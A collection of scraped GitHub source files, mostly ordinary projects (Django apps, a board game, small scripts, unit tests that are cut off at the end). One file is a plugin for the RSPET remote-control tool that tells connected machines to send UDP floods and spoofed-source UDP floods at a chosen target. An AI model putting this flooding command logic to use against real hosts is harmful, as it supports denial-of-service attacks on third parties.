blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 281 | content_id stringlengths 40 40 | detected_licenses listlengths 0 57 | license_type stringclasses 2
values | repo_name stringlengths 6 116 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 313
values | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 18.2k 668M ⌀ | star_events_count int64 0 102k | fork_events_count int64 0 38.2k | gha_license_id stringclasses 17
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 107
values | src_encoding stringclasses 20
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 4 6.02M | extension stringclasses 78
values | content stringlengths 2 6.02M | authors listlengths 1 1 | author stringlengths 0 175 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
627745945b0f470a8f0c2173638f2a6876f3e8e8 | 132f602a34035037bb157b8c83fec7b8c5bbd967 | /article/migrations/0006_article_article_image.py | 56705d3613710a760286286f56be46f58c949847 | [] | no_license | burakkoroglu/blogapp | aa0a24bcfcf0920986d6bcb948441108ca9a9223 | b296b68ed9dd514250d4ac782702c44449830325 | refs/heads/main | 2023-03-29T17:22:37.643845 | 2021-03-31T20:45:45 | 2021-03-31T20:45:45 | 353,485,431 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 456 | py | # Generated by Django 3.1.7 on 2021-03-30 20:17
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated migration: add an optional ``article_image`` file
    field to the ``article`` model."""
    # Must apply after migration 0005 of the ``article`` app.
    dependencies = [
        ('article', '0005_auto_20210330_2143'),
    ]
    operations = [
        migrations.AddField(
            model_name='article',
            name='article_image',
            # blank/null make the upload optional; upload_to='' stores files
            # directly under MEDIA_ROOT. verbose_name is Turkish:
            # "add a photo to the article".
            field=models.FileField(blank=True, null=True, upload_to='', verbose_name='Makaleye Fotograf ekleyin'),
        ),
    ]
| [
"burakkoroglu200052@gmail.com"
] | burakkoroglu200052@gmail.com |
fa39344f8d4e8ce35c807e8f98786b7b6f061a8c | c50a1348addcfda57342b7141e2a6b821e2a38d9 | /stonehenge_game.py | e32b3fdf4d944fbde9f2d68a53c40328c3e35e91 | [] | no_license | KG-UT/game-files | edc3f2a87a7739745a17d8075c203904629fdb8c | ba07bd54259a7d96b75159d778f227c6b6a89f99 | refs/heads/master | 2021-08-05T04:12:44.324387 | 2019-01-09T06:50:32 | 2019-01-09T06:50:32 | 136,755,697 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,788 | py | """StoneHenge game. Subclass of game."""
from game import Game
from stonehenge_state_4 import StonehengeState
class Stonehenge(Game):
    """Implementation of the game Stonehenge."""
    # Game state tracking the board grid, current player and leyline scores.
    current_state: StonehengeState
    def __init__(self, p1_starts: bool) -> None:
        """initializes the game Stonehenge.

        Prompts for a board side length, labels the playable cells
        'A', 'B', ... row by row, and pads every row (plus an extra first
        and last row) with '@' markers representing unclaimed leylines.
        """
        side_length = int(input("What side length board do you want?: "))
        n = side_length + 1
        all_rows = []
        ascii_stuff = 64  # chr(65) == 'A'; incremented before each use
        for row in range(side_length):
            new_row = []
            num_slots = 2
            # Row k receives k + 2 cells: the loop runs (row + 4) - 2 times.
            while num_slots != row+4:
                ascii_stuff += 1
                new_row.append(chr(ascii_stuff))
                num_slots += 1
            all_rows.append(new_row)
        new_row = []
        num_slots = 0
        # Final (bottom) row holds exactly side_length cells.
        while num_slots != side_length:
            ascii_stuff += 1
            new_row.append(chr(ascii_stuff))
            num_slots += 1
        all_rows.append(new_row)
        # '@' at the head of each row plus an all-'@' first and last row are
        # the leyline markers surrounding the hexagonal grid.
        for row in all_rows:
            row.insert(0, '@')
        all_rows.insert(0, ['@']*n)
        all_rows.append(['@']*n)
        self.current_state = StonehengeState(p1_starts, all_rows)
    def get_instructions(self) -> str:
        """returns the instruction to the game."""
        instructions = """Players take turns occupying cells. A player
        gets a leyline when they occupy at least half of the cells
        in a line associated with a leyline. There is a leyline
        for each unique diagonal and horizontal line on the grid.
        The player who gains half of the leylines first wins."""
        return instructions
    def is_over(self, state: StonehengeState) -> bool:
        """return if the game is over.

        Over when no moves remain or either player has claimed at least
        half of all leylines.
        """
        if state.get_possible_moves() == []:
            return True
        # NOTE(review): get_points() appears to map True -> p1's leylines,
        # False -> p2's, and 2 -> total leyline count — confirm against
        # StonehengeState.get_points.
        leylines = state.get_points()
        if leylines[True] >= leylines[2]/2:
            return True
        if leylines[False] >= leylines[2]/2:
            return True
        return False
    def is_winner(self, player: str) -> bool:
        """return whether player ('p1' or 'p2') is the winner of the game"""
        if self.is_over(self.current_state):
            leylines = self.current_state.get_points()
            if (player == 'p1' and
                    leylines[True] >= leylines[2]/2):
                return True
            elif (player == 'p2' and
                    leylines[False] >= leylines[2]/2):
                return True
        return False
    def str_to_move(self, string: str) -> str:
        """turns a string into a move that can
        be accepted by self.state"""
        # Moves are the cell labels themselves, so no conversion is needed.
        return string
if __name__ == '__main__':
    # Run the course's style checker before starting an interactive game.
    from python_ta import check_all
    check_all(config="a2_pyta.txt")
    # check_all does not exit, so a demo game (p1 starts) runs afterwards.
    x = Stonehenge(True)
    print(x.current_state)
| [
"noreply@github.com"
] | noreply@github.com |
e55166ca9c432b519f2b37f9fcbc65f2d7f3b754 | 7d8d506923361f7e6b2f8653b5d149b160128fe2 | /quizproject/urls.py | cc61281e0c82380759f7ee4c21b2ef661b9b0df1 | [] | no_license | satish17s/quizproject | 48a8884bb499c59501ca438a40433485da85c4cf | 58f462b86032b8ddfa580c453753144c8404da92 | refs/heads/master | 2022-12-15T04:51:27.442684 | 2020-09-15T17:56:07 | 2020-09-15T17:56:07 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,160 | py | """quizproject URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path,re_path
from triviaapp import views
from django.conf.urls.static import static
# URL routes for the trivia app: admin, name entry, gameplay, per-question
# pages (pk = question id), summary and history.
urlpatterns = [
    path('admin/', admin.site.urls),
    path('', views.getname, name='getname'),
    path('playgame', views.playgame, name='playgame'),
    # re_path('question1', views.question1, name='question1'),
    # Raw string: "\d" in a plain string is an invalid escape sequence
    # (DeprecationWarning since Python 3.6, SyntaxError eventually).
    re_path(r'question/(?P<pk>\d+)/$', views.question, name='question'),
    path('summary', views.summary, name='summary'),
    path('history', views.history, name='history'),
]
| [
"satishsharma.cse@gmail.com"
] | satishsharma.cse@gmail.com |
1a9d4801ecc2db4d58bf854ae7c85e88b3f93d32 | cbe3cb352a7512ef4ef4ea1c4e3ab5719da95e6e | /day0209/code7_12.py | 94b069e1bbb08ba5eb116a6e0a98c5505d58b024 | [] | no_license | kyousuke-s/PythonTraining | 10fdc374bc637a3d2f1ff7315cc53f1fda27fabd | 6c3a3d9652765e79045cff99f713ac244b10b391 | refs/heads/master | 2023-03-05T20:33:24.704648 | 2021-02-16T00:12:08 | 2021-02-16T00:12:08 | 338,927,877 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 111 | py | import matplotlib.pyplot as plt
weight = [68.4,68.0,70.2,76.7,56.6,68.9,65.7,66.6]
plt.plot(weight)
plt.show()
| [
"kyousukesato8@gmail.com"
] | kyousukesato8@gmail.com |
dc26b2731cb16eb441a4a54b65c066c486e0c57f | d3f484a7be524f71f4614b242d2649364b981536 | /day-01/part1.py | 1b3eca902a2c5c005c61c17f2a6311f115097701 | [] | no_license | NISH1001/advent-of-code-2018 | 581ce4466594c412b820599bf6dc5fb5d9f200a9 | a4eaa35265afca0318c769335d46dd6ccc77ad0a | refs/heads/master | 2020-04-09T04:00:09.910278 | 2018-12-11T05:49:46 | 2018-12-11T05:49:46 | 160,006,445 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 171 | py | #!/usr/bin/env python3
def main():
    """Sum the one-integer-per-line puzzle input and print the total."""
    with open('input') as puzzle:
        total = sum(int(line) for line in puzzle)
    print(total)


if __name__ == "__main__":
    main()
| [
"nishanpantha@gmail.com"
] | nishanpantha@gmail.com |
c71a372a975e84cfa1beca53766244361b5b5f77 | c06b6c0eb8274f73b78c82c2a9c9b3428931ef5d | /models/store.py | c0ce4f50880cc46b24bf358e376a948d72e85324 | [] | no_license | aleksandar89bt/Python-REST-API-with-flask | 943dfc038b199070dcdd0846b952c257cb7f69e8 | 3feb5a639d3ccb2a38eca27bd316680eae57a77b | refs/heads/master | 2020-09-13T13:39:00.466987 | 2019-11-20T21:38:49 | 2019-11-20T21:38:49 | 222,801,634 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 668 | py | from db import db
class StoreModel(db.Model):
    """SQLAlchemy model for a store that owns a collection of items."""
    __tablename__ = 'stores'
    id = db.Column(db.Integer, primary_key=True)
    name = db.Column(db.String(80))
    # lazy='dynamic': ``items`` is a query object, so callers must use
    # ``.all()`` (see json()) — items are not loaded until asked for.
    items = db.relationship('ItemModel', lazy='dynamic')
    def __init__(self, name):
        """Create an (unsaved) store with the given name."""
        self.name = name
    def json(self):
        """Return a JSON-serializable dict of the store and all its items."""
        return {"name": self.name, "items": [item.json() for item in self.items.all()]}
    @classmethod
    def find_by_name(cls, name):
        """Return the first store with this name, or None."""
        return cls.query.filter_by(name=name).first()
    def save_to_db(self):
        """Insert or update this store in the database."""
        db.session.add(self)
        db.session.commit()
    def delete_from_db(self):
        """Delete this store from the database."""
        db.session.delete(self)
        db.session.commit()
| [
"aleksandar89bt@hotmail.com"
] | aleksandar89bt@hotmail.com |
52dd599df6e77fd91779278402d371535e57b18a | b7ad5a09bbf48a058ca83d92d11159f30f9726ef | /plugins/udp.py | 618943d7b2a4a4dda1ca89ad4a0b6b77ecf8b362 | [] | no_license | RSPET/rspet.github.io | 71a619ff4cec67b4f6870b7032a4d190690f8a80 | 115c693155e817b0819961a32cca97d6941063d7 | refs/heads/master | 2020-09-21T05:00:28.735926 | 2017-10-29T12:12:14 | 2017-10-29T12:12:14 | 66,701,178 | 0 | 1 | null | 2017-10-29T12:08:37 | 2016-08-27T07:06:54 | CSS | UTF-8 | Python | false | false | 2,788 | py | """
Plug-in module for RSPET server. Offer functions related to udp flooding.
"""
from __future__ import print_function
from socket import error as sock_error
from Plugins.mount import Plugin
class Files(Plugin):
    """
    Plugin expanding RSPET with UDP flooding commands.

    Each command returns a 3-item list: [transition, error_code, message].
    Error codes: 0 = OK, 1 = invalid syntax, 2 = socket error.
    """
    __server_commands__ = {}
    __cmd_help__ = {}

    def __init__(self):
        """
        Register this plugin's CLI commands, their syntax and their scope.
        """
        self.__server_commands__["UDP_Flood"] = [self.udp_flood, "connected",
                                                 "multiple"]
        self.__cmd_help__["UDP_Flood"] = (
            "UDP_Flood <target_ip> <target_port> [payload]")
        self.__server_commands__["UDP_Spoof"] = [self.udp_spoof, "connected",
                                                 "multiple"]
        self.__cmd_help__["UDP_Spoof"] = (
            "UDP_Spoof <target_ip> <target_port> <spoofed_ip> <spoofed_port> [payload]")

    def udp_flood(self, server, args):
        """Flood target machine with UDP packets."""
        result = [None, 0, ""]
        # Guard clause: need at least a target IP and port.
        if len(args) < 2:
            result[2] = ("Syntax : %s" % self.__cmd_help__["UDP_Flood"])
            result[1] = 1  # Invalid Syntax Error Code
            return result
        try:
            # IP:port:payload
            flood_cmd = "%s:%s:%s" % (args[0], args[1], args[2])
        except IndexError:
            # No payload supplied — default to "Hi".
            flood_cmd = "%s:%s:Hi" % (args[0], args[1])
        for target in server.get_selected():
            try:
                target.send(target.command_dict['udpFlood'])
                target.send("%03d" % len(flood_cmd))
                target.send(flood_cmd)
            except sock_error:
                # Drop the dead host and report a socket failure.
                target.purge()
                result[0] = "basic"
                result[1] = 2  # Socket Error Code
        return result

    def udp_spoof(self, server, args):
        """Flood target machine with UDP packets via spoofed ip & port."""
        result = [None, 0, ""]
        # Guard clause: need target IP/port and spoofed IP/port.
        if len(args) < 4:
            result[2] = ("Syntax : %s" % self.__cmd_help__["UDP_Spoof"])
            result[1] = 1  # Invalid Syntax Error Code
            return result
        try:
            # IP:port:new_ip:new_port:payload
            spoof_cmd = "%s:%s:%s:%s:%s" % (args[0], args[1], args[2], args[3], args[4])
        except IndexError:
            # No payload supplied — default to "Hi".
            spoof_cmd = "%s:%s:%s:%s:Hi" % (args[0], args[1], args[2], args[3])
        for target in server.get_selected():
            try:
                target.send(target.command_dict['udpSpoof'])
                target.send("%03d" % len(spoof_cmd))
                target.send(spoof_cmd)
            except sock_error:
                # Drop the dead host and report a socket failure.
                target.purge()
                result[0] = "basic"
                result[1] = 2  # Socket Error Code
        return result
| [
"panos122008@gmail.com"
] | panos122008@gmail.com |
d64da185dd8fee430d47d7f3bce31fb57e9bbee4 | 823add886f95b79f806429f46f8c1aa5f0dd92c1 | /dbdjd/venv/bin/pip3 | ba65a2918183519c2fc2796728d451a7ea0c0de1 | [] | no_license | lpgph/python | e3a5e320aa1625b6f4bc0d01389349fa5b5fff2c | 84f88b4623f482ed3af14a21c78c62818268576a | refs/heads/master | 2022-08-29T12:54:08.790123 | 2020-05-28T10:26:14 | 2020-05-28T10:26:14 | 64,984,273 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 251 | #!/home/lpgph/Public/Work/python/dbdjd/venv/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from pip._internal import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"penghui.guo@outlook.com"
] | penghui.guo@outlook.com | |
4575d970e83e1f8dc41172f9fac691d384b2aeed | 1afa27fd4084cd704e99d8d0b17b6b2f6ee15a32 | /manage.py | 68852e0bcf6807e5d9778fadda506484cbc49aa7 | [] | no_license | brandon30Last/Portfolio-Project | 9124aa803a5fab07f0c07ed46c9f396a9d2c4b8c | b04ea7655fee848a2ecea050cb8b89a68a3d3128 | refs/heads/master | 2022-11-07T15:16:38.086674 | 2020-06-03T19:43:44 | 2020-06-03T19:43:44 | 269,091,750 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 633 | py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
    """Django's command-line entry point for administrative tasks."""
    os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'PortfolioMain.settings')
    try:
        from django.core.management import execute_from_command_line
    except ImportError as exc:
        # Chain the original error so the real cause stays visible.
        message = (
            "Couldn't import Django. Are you sure it's installed and "
            "available on your PYTHONPATH environment variable? Did you "
            "forget to activate a virtual environment?"
        )
        raise ImportError(message) from exc
    execute_from_command_line(sys.argv)


if __name__ == '__main__':
    main()
| [
"brandon30last@gmail.com"
] | brandon30last@gmail.com |
456c2b78de112d96dc0c73cfd9ab785781b0d05e | dffc22d31c2d2d1d6e364d910bc4b2b709f5b344 | /manage.py | 8e8f1123812c7e508868224ff66c52525d6a3558 | [] | no_license | dolastack/rssfeed | adeb85da802090924d450355f34e9c3e2d1f3c31 | 8543b3b97bf2e73627341353b6083deb842831f1 | refs/heads/master | 2021-01-21T17:06:52.820027 | 2017-07-08T02:45:59 | 2017-07-08T02:45:59 | 91,932,776 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 805 | py | #!/usr/bin/env python
import os
import sys
# Standard Django 1.x manage.py entry point.
if __name__ == "__main__":
    os.environ.setdefault("DJANGO_SETTINGS_MODULE", "rssfeed.settings")
    try:
        from django.core.management import execute_from_command_line
    except ImportError:
        # The above import may fail for some other reason. Ensure that the
        # issue is really that Django is missing to avoid masking other
        # exceptions on Python 2.
        try:
            import django
        except ImportError:
            raise ImportError(
                "Couldn't import Django. Are you sure it's installed and "
                "available on your PYTHONPATH environment variable? Did you "
                "forget to activate a virtual environment?"
            )
        # Django exists, so re-raise the original (unrelated) ImportError.
        raise
    execute_from_command_line(sys.argv)
| [
"india@ubuntu.dolastack.com"
] | india@ubuntu.dolastack.com |
657df645b7c4a352581d802e29ead9bbcc0e831d | 1b1158b51eb508f8712eddfb8730d468d824cf07 | /screening_task/urls.py | 39375aed0f824b5576e490fea9837d0a59673f6a | [] | no_license | BesnardConsultingSAS/django-screening | cadb658156c57edbc0294a756884880572ce24d3 | ff5110e37a4fd7aea7f20dc97dffa51ab019ac4e | refs/heads/master | 2022-12-09T16:53:32.857074 | 2020-08-11T14:20:40 | 2020-08-18T12:16:02 | 286,722,456 | 0 | 0 | null | 2020-09-14T11:28:06 | 2020-08-11T11:08:52 | Python | UTF-8 | Python | false | false | 1,211 | py | """screening_task URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/dev/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.urls import path, include
from drf_yasg.views import get_schema_view
from drf_yasg import openapi
from rest_framework import permissions
# Application routes: the agile app handles everything under /agile/.
urlpatterns = [
    path("agile/", include("agile.urls")),
]
# drf-yasg schema view backing the interactive Swagger documentation.
schema_view = get_schema_view(
    openapi.Info(
        title="LASSI API", default_version="v1", description="LASSI API Documentation",
    ),
    public=True,
    permission_classes=(permissions.AllowAny,),
)
# Serve the Swagger UI at /api-docs/ (cache disabled for development).
urlpatterns += [
    path(
        "api-docs/",
        schema_view.with_ui("swagger", cache_timeout=0),
        name="schema-swagger-ui",
    ),
]
| [
"contact@besnard-consulting.com"
] | contact@besnard-consulting.com |
83530addf4bdcb1e897e3ff6b44c9a664f8df6c3 | 880e49e43653a61f22df428aed02571177721c72 | /doubleDB/routers.py | ed206c1562f70d39b86f41452627f647b0649ecf | [] | no_license | lacosmok/doubledb | 30e9115554bce32bcf46a7ab1c47a23b0c26309b | 3cbf9a064abc54b71613d86541e1e2b524b70da2 | refs/heads/master | 2020-03-20T21:58:41.440766 | 2018-06-18T22:44:34 | 2018-06-18T22:44:34 | 137,772,210 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 703 | py |
class PrimaryRouter:
    """Database router: all reads hit 'default'; writes go to 'default' or
    'seconddb' depending on the instance's ``default_database`` flag."""

    def db_for_read(self, model, **hints):
        """
        All reads go to the primary database.
        """
        return 'default'

    def db_for_write(self, model, **hints):
        """
        Route writes by the instance's ``default_database`` attribute.

        Django does not always supply an ``instance`` hint (e.g. bulk
        operations), so fall back to 'default' instead of raising KeyError.
        """
        instance = hints.get('instance')
        if instance is None or instance.default_database:
            return 'default'
        return 'seconddb'

    def allow_relation(self, obj1, obj2, **hints):
        """
        Allow all relations.

        NOTE(review): Django expects True/False/None here; the truthy
        string 'default' is preserved for backward compatibility, but it
        should probably just be ``True``.
        """
        return 'default'

    def allow_migrate(self, db, app_label, model_name=None, **hints):
        """
        Allow every migration on every database.
        """
        return True
| [
"lacosmok@gmail.com"
] | lacosmok@gmail.com |
17751572ebd1d61ba26c0d2bd99c9e79125c6933 | 511d9f8eeb89e26cb3901d8ce8f656e4c3a23c42 | /src/program3Test.py | 99ca4cb3d116d419767bad4b88d485eaaf5b82bf | [] | no_license | tiansiyu0210/Python-hw3 | 166475c79a0895e8d55923da4138cd177df4a511 | d86d15b3abe5a20c83f7326af0c0eb4ca73bf7d3 | refs/heads/master | 2020-04-05T13:24:29.867968 | 2018-11-11T02:51:02 | 2018-11-11T02:51:02 | 156,901,127 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,128 | py | import unittest
from src import program3
class Program3Test(unittest.TestCase):
    """Credit-card validation tests for program3.CreditCard.isValid.

    Each prefix family (37..., 4..., 5..., 6... — presumably Amex, Visa,
    MasterCard, Discover; confirm against program3) gets one number that
    should validate and one that should not.
    """
    def test_case_1(self):
        test = program3.CreditCard()
        self.assertTrue(test.isValid('371232345686516'))
    def test_case_2(self):
        test = program3.CreditCard()
        self.assertFalse(test.isValid('371232345686546'))
    def test_case_3(self):
        test = program3.CreditCard()
        self.assertTrue(test.isValid('41232345683411'))
    def test_case_4(self):
        test = program3.CreditCard()
        self.assertFalse(test.isValid('41232345683412'))
    def test_case_5(self):
        test = program3.CreditCard()
        self.assertTrue(test.isValid('51232345686544'))
    def test_case_6(self):
        test = program3.CreditCard()
        self.assertFalse(test.isValid('51232345686547'))
    def test_case_7(self):
        test = program3.CreditCard()
        self.assertTrue(test.isValid('61232345686542'))
    def test_case_8(self):
        test = program3.CreditCard()
        self.assertFalse(test.isValid('61232345686547'))
if __name__ == '__main__':
    # unittest.main() runs the TestCase and then calls sys.exit(), so no
    # code after it executes when this file is run as a script.
    unittest.main()
# Removed the stray module-level `p3t = Program3Test()`: it was unreachable
# when run as a script and served no purpose on import.
| [
"tiansiyu297@gmail.com"
] | tiansiyu297@gmail.com |
b028d6e77fbcf0591d0e14ba348002c534cdc523 | 7670a25a77f418ac5ed9728bb276c1848b0467c5 | /tests/test_model.py | 2a7435561a34b4ea54634c913a202487214ff18e | [] | no_license | rhzphlv/deploying_model | f9aef3da360160c519197c51bd97f8c696a42a2e | a4bfb2299aa5e629d42c3fca0a779570a26dc9b5 | refs/heads/main | 2023-03-30T13:26:49.683384 | 2021-03-23T20:29:51 | 2021-03-23T20:29:51 | 350,238,206 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 774 | py | from deployment_model.predict import make_prediction
from deployment_model.processing.data_management import load_test_set
from deployment_model.config import config
import math
def test_single_value():
    """A prediction on two test rows yields a non-empty float result."""
    #Given
    test_data = load_test_set(filename = config.TEST_DATA)
    json_test = test_data[0:2].to_json(orient = 'records')
    #When
    subject = make_prediction(input_data = json_test)
    #Then
    assert subject is not None
    assert isinstance(subject.get('predictions')[0],float)
def test_validation():
    """Prediction count matches the test set size after NA rows are dropped."""
    #Given
    test_data = load_test_set(filename = config.TEST_DATA)
    json_test = test_data.to_json(orient = 'records')
    #When
    subject = make_prediction(input_data = json_test)
    #Then
    #num of row after dropping NA values = 566
    assert len(subject.get('predictions')) == 566
| [
"rheza.jogja@gmail.com"
] | rheza.jogja@gmail.com |
a8f68a8dd54e0a5b800694a854a7f8df626bd445 | 1bbde263e4691d0fa71d2f68561a8c5013a39544 | /Epic6/test_app.py | 59fb8889866be35d2396ad28e3732a69082bcdaa | [] | no_license | robbm96/InCollege-Project | fc510d87c8d1e99a12cb6d83a1726058e437eb2f | f32a413f67d687d69cd5258adcb216f14a962fc9 | refs/heads/main | 2023-01-01T21:52:52.782471 | 2020-10-25T23:44:00 | 2020-10-25T23:44:00 | 306,399,189 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 21,374 | py | # This file contains all our pytest
# Import every method/variable from our app file
from app import *
import json
print("Starting test")  # import-time marker; prints once when pytest collects this module
def test_user_option():
    """get_user_option(lo, hi) returns an int inside the requested range."""
    option = get_user_option(1, 3)
    assert isinstance(option, int)
    # Bound the check by the range actually requested (1..3); the old
    # assertion allowed 4 and 5, which get_user_option(1, 3) must not return.
    assert 1 <= option <= 3
def test_verify_password():
    """verify_password accepts strong passwords and rejects weak ones."""
    strong = ["tahirMon@1", "hoanGngu@12", "joRgo(76"]
    weak = ["tahirMo", "hoangnguy@", "jorgoK76", "invalid", "inV#lid"]
    for candidate in strong:
        assert verify_password(candidate) is True
    for candidate in weak:
        assert verify_password(candidate) is False
# initializes empty database (module level: runs once before any test below)
with open("test_database.json", 'w+') as db:
    init_db = {
        "users": []
    }
    json.dump(init_db, db)
    # NOTE(review): redundant — the with-statement already closes the file.
    db.close()
def test_login_and_register():
    """Register and log in five users, then check uniqueness constraints.

    The database is assumed to hold at most five users; after removing the
    last one, re-registering duplicate names must fail and re-adding the
    removed user must succeed.
    """
    valid_fake_users = [
        {"username": "newUser46", "password": "tahirMon@1",
         "first_name": "John", "last_name": "Cena"},
        {"username": "newUser47", "password": "hoanGngu@12",
         "first_name": "The", "last_name": "Rock"},
        {"username": "newUser48",
         "password": "joRgo(76", "first_name": "Elon", "last_name": "Musk"},
        {"username": "newUser49", "password": "newUser4@",
         "first_name": "Steve", "last_name": "Jobs"},
        {"username": "newUser50", "password": "newUser4$",
         "first_name": "Bill", "last_name": "Gates"},
    ]
    for user in valid_fake_users:
        assert verify_register(user["username"], user["password"], user["first_name"],
                               user["last_name"], database="test_database.json") == True
        assert login(user["username"], user["password"],
                     database="test_database.json") == True  # verify_login
    # lets now delete user and test that we can't register a user that doesnt have unique username and first/last name
    with open("test_database.json", 'r') as db:
        data = json.load(db)
        db.close()
    with open("test_database.json", 'w+') as db:
        data["users"].pop()
        json.dump(data, db)
        db.close()
    for i in range(4):
        assert verify_register(valid_fake_users[i]["username"], valid_fake_users[i]["password"], valid_fake_users[i]
                               ["first_name"], valid_fake_users[i]["last_name"], database="test_database.json") == False
    # Insert the user that was deleted so it is full again
    assert verify_register(valid_fake_users[4]["username"], valid_fake_users[4]["password"], valid_fake_users[4]
                           ["first_name"], valid_fake_users[4]["last_name"], database="test_database.json") == True
def test_skills_options():
    """list_of_skills returns [choice, label]; the label must match the menu."""
    options = list_of_skills()
    menu = {
        1: "1.) Programming",
        2: "2.) Carpentry",
        3: "3.) Photography",
        4: "4.) Microsoft Excel",
        5: "5.) Learn Spanish",
        6: "6.) Exit",
    }
    assert 1 <= options[0] <= 6
    if options[0] in menu:
        assert options[1] == menu[options[0]]
def test_post_job():
    """Invalid postings return [False, 500]; valid ones [True, 200]; the
    fifth posting must hit the 4-job cap and return [False, 404]."""
    valid_fake_jobs = [
        ["", "", "", "", ""],
        ["Mover", "Help clients move to new house",
            "Bulls Moving Co.", "Tampa, FL", 10],
        ["Developer", "Develop new state of the art software at our company!",
            "Apple", "San Francisco, CA", "hudred thousand dollars"],
        ["Professor", "None", "USF", "Tampa, FL", 80000],
    ]
    new_job = ["Janitor", "Clean the mess of the future generation of engineers",
               "USF", "Tampa, FL", "25 dollars an hours"]
    # None fields mark a posting as invalid (empty strings are allowed).
    invalid_fake_jobs = [
        [None, "Help clients move to new house",
            "Bulls Moving Co.", "Tampa, Fl", 10],
        ["Professor", None, "USF", "Tampa, Fl", 80000],
        [None, "Clean the mess of the future generation of engineers",
            "USF", "Tampa, FL", None],
    ]
    # Test invalid jobs
    for i in range(len(invalid_fake_jobs)):
        assert post_job(invalid_fake_jobs[i][0], invalid_fake_jobs[i][1], invalid_fake_jobs[i][2],
                        invalid_fake_jobs[i][3], invalid_fake_jobs[i][4], database="test_database.json") == [False, 500]
    # Login each user to Test valid job postings
    with open("test_database.json", "r") as db:
        data = json.load(db)
        db.close()
    i = 0
    for user in data["users"]:
        login(user["username"], user["password"],
              database="test_database.json")
        if i == 4:  # Test limit of 4 jobs
            assert post_job(new_job[0], new_job[1], new_job[2], new_job[3],
                            new_job[4], database="test_database.json") == [False, 404]
        else:  # Test valid jobs
            assert post_job(valid_fake_jobs[i][0], valid_fake_jobs[i][1], valid_fake_jobs[i][2],
                            valid_fake_jobs[i][3], valid_fake_jobs[i][4], database="test_database.json") == [True, 200]
        i += 1
def test_find_user():
    """find_user is False for names not in the database and True for every
    registered first/last name pair."""
    # valid_fake_users mirrors the registered users but is unused below —
    # the second loop reads the database directly instead.
    valid_fake_users = [
        {"username": "newUser46", "password": "tahirMon@1",
         "first_name": "John", "last_name": "Cena"},
        {"username": "newUser47", "password": "hoanGngu@12",
         "first_name": "The", "last_name": "Rock"},
        {"username": "newUser48",
         "password": "joRgo(76", "first_name": "Elon", "last_name": "Musk"},
        {"username": "newUser49", "password": "newUser4@",
         "first_name": "Steve", "last_name": "Jobs"},
        {"username": "newUser50", "password": "newUser4$",
         "first_name": "Bill", "last_name": "Gates"},
    ]
    # Near-miss names that must not match anyone in the database.
    invalid_fake_users = [
        {"username": "newUser44", "password": "tahirM3on@1",
         "first_name": "Johns", "last_name": "Qen"},
        {"username": "newUser42", "password": "hoanGn3gu@12",
         "first_name": "Thes", "last_name": "Rocky"},
        {"username": "newUser41",
         "password": "joRgo2(76", "first_name": "Elona", "last_name": "Musq"},
        {"username": "newUser4", "password": "newUser14@",
         "first_name": "Steven", "last_name": "Job"},
        {"username": "newUser510", "password": "newU1ser4$",
         "first_name": "Billy", "last_name": "Gate"},
    ]
    for user in invalid_fake_users:
        assert find_user(user["first_name"], user["last_name"],
                         database="test_database.json") == False
    with open("test_database.json", "r") as db:
        data = json.load(db)
        db.close()
    for user in data["users"]:
        assert find_user(user["first_name"], user["last_name"],
                         database="test_database.json") == True
def test_useful_links():
    """Exercise print_useful_links() and check its return value per option.

    NOTE(review): several branches are contradictory or can never pass
    (e.g. ``if options == 1: assert options == "..."`` and the duplicated
    ``if options == 2/3/4/5`` checks later with different expected values);
    this test only behaves when the function returns one specific value.
    """
    ### CANNOT TEST SIGNUP OPTION, WILL FAIL BECAUSE OF EXTRA NEEDED INPUT ###
    # Delete a user if database is full to test the sign up option
    # with open("database.json", 'r') as db:
    #     data = json.load(db)
    #     db.close()
    # with open("database.json", 'w+') as db:
    #     data["users"].pop()
    #     json.dump(data, db)
    #     db.close()
    options = print_useful_links()
    if options == 1:
        assert options == """
        --Available Options--
        1.) Sign Up
        2.) Help Center
        3.) About
        4.) Press
        5.) Blog
        6.) Careers
        7.) Developers
